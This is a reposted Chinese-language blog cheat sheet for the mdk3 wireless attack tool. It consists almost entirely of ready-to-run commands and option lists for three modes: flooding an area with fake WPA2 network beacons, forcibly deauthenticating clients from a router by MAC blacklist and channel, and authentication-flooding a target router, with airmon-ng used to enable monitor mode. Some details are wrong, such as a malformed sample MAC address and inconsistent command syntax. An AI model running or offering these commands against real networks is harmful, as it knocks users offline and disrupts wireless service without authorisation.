mdk3 <接口> <測試_模塊> [測試選項] 例:mdk3 --wlan0mon b (通過mdk3 使用網卡接口調用b類測試模塊發起攻擊)
請注意該mdk3軟件在使用時必須打開網卡捕獲功能可以打開一個命令窗口輸入
airmon-ng start wlan0 (激活網卡監聽功能)
mdk3 wlan0mon b -f /root/wifi.txt -a -s 1500 (通過MDK3使用網卡接口調用B類測試模塊 使用root目錄下的wifi.txt文件列表制作一個WPA/2加密的WIFI信號並且傳輸速率為 1500)
所有參數
-f <WIFI名稱列表文件的所在位置> 使用此WIFI列表發起信號溢出攻擊
-v <帶WIFI名稱和MAC地址的對應文件所在位置> 使用此WIFI列表和MAC地址列表發起信號溢出攻擊
-w 加密方式為WEP
-t 加密方式為WPA/PSK
-a 加密方式為WPA/2
-g 54M模式
-m 讀取數據庫中的MAC地址列表
-c <信道數> 設置這些偽造的這些WIFI信號的信道數
-s <幀數> 設置廣播這些偽造WIFI數據包的速度,速度越快用戶接受到的列表越多越快,但是對網卡有一定影響
mdk3 wlan0mon d -b /root/wifi.txt -c 1 -s 1000(通過MDK3使用網卡接口調用D類測試模塊 使用root目錄下的wifi.txt文件里的MAC地址列表向路由器發出只要黑名單<WIFI.TXT>里的MAC地址全部強制解除認證 該方法只能攻擊WIFI信道為1的WIFI信號並且設置發送速度為1000)
所有參數
-w <白名單文件的位置> MAC地址白名單里的所有MAC地址都能正常連接WIFI
-b <黑名單文件的位置> MAC地址黑名單里的所有MAC地址全部解除與路由器的連接
-s <幀數> 設置廣播數據包的速度 ,幀數越大,傳播速度越快
-c <信道數> 設置要攻擊的WIFI信道
mdk3 wlan0mon a -a M2:B6:N4:N2:H7:J0 -m /root/wifi.txt (通過MDK3使用網卡接口調用A類測試模塊 使用root目錄下的wifi.txt文件來攻擊MAC地址為M2:B6:N4:N2:H7:J0的路由器)
所有參數
-a 通過文件里的MAC地址去攻擊並且檢測被攻擊路由器是否有文件中的MAC地址
m 調用數據庫中的連接MAC地址
c 不測試被攻擊的路由器里有沒有文件里的MAC地址(與-a用法相反)
i d對指定路由器MAC地址自動攻擊(不用自己創建MAC地址列表文件)
s <幀數> 設置廣播數據包的速度 ,幀數越大,傳播速度越快
————————————————
版權聲明:本文為CSDN博主「我不是貓叔」的原創文章,遵循CC 4.0 BY-SA版權協議,轉載請附上原文出處鏈接及本聲明。
原文鏈接:https://blog.csdn.net/JN_Cat/article/details/102302748